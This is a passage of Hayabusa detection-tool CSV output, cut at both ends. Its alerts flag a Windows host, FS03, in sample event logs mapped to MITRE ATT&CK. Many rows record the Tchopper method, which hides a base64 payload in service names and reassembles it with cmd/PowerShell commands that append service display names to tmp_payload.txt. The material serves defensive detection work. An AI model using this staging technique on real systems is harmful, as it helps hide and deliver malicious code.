b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | 
Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload 
transfer via service name - Tchopper.evtx +2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files 
or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: 
FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
